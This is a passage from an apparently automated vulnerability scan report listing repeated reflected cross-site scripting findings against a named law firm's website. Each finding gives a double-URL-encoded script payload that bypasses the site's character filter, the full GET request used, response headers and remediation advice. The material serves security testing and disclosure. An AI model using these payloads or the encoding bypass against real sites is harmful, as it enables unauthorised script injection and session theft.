Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c was submitted in the REST URL parameter 2. This input was echoed as a9d57"><script>alert(1)</script>6a7d4ade41c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/script.jsa9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079 was submitted in the REST URL parameter 1. This input was echoed as 2bbc8"><script>alert(1)</script>5280505d079 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079/ui.core.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 was submitted in the REST URL parameter 2. This input was echoed as 79a0d"><script>alert(1)</script>713c91dcce2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.core.js79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d was submitted in the REST URL parameter 1. This input was echoed as 33f74"><script>alert(1)</script>75df592a80d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d/ui.datepicker.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea was submitted in the REST URL parameter 2. This input was echoed as 29ad5"><script>alert(1)</script>e294e4483ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.datepicker.js29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd was submitted in the REST URL parameter 1. This input was echoed as fe969"><script>alert(1)</script>c77ca9823dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /jsfe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd/ui.dialog.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de was submitted in the REST URL parameter 2. This input was echoed as 4ae75"><script>alert(1)</script>6ccc3364de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.dialog.js4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed was submitted in the REST URL parameter 1. This input was echoed as 41fbd"><script>alert(1)</script>3ba108ca8ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed/ui.draggable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 was submitted in the REST URL parameter 2. This input was echoed as ee808"><script>alert(1)</script>982f7a16b81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.draggable.jsee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e was submitted in the REST URL parameter 1. This input was echoed as 159bb"><script>alert(1)</script>ff8afb5f36e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e/ui.resizable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 was submitted in the REST URL parameter 2. This input was echoed as 6dd6d"><script>alert(1)</script>a322173fb55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.resizable.js6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f was submitted in the REST URL parameter 1. This input was echoed as 4823f"><script>alert(1)</script>74755294a4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f/awards/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe was submitted in the REST URL parameter 2. This input was echoed as 3ddba"><script>alert(1)</script>b482c6d5ffe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/awards3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 was submitted in the REST URL parameter 3. This input was echoed as 4862c"><script>alert(1)</script>626bbbadd84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/awards/rss.xml4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56 was submitted in the REST URL parameter 1. This input was echoed as 96c9a"><script>alert(1)</script>b17c06f0b56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56/events/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192 was submitted in the REST URL parameter 2. This input was echoed as 8d1d6"><script>alert(1)</script>3f934a0d192 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/events8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a was submitted in the REST URL parameter 3. This input was echoed as 5ac25"><script>alert(1)</script>a7c854d93a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/events/rss.xml5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c was submitted in the REST URL parameter 1. This input was echoed as cefc3"><script>alert(1)</script>b60ad84eb9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rsscefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c/in_the_news/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
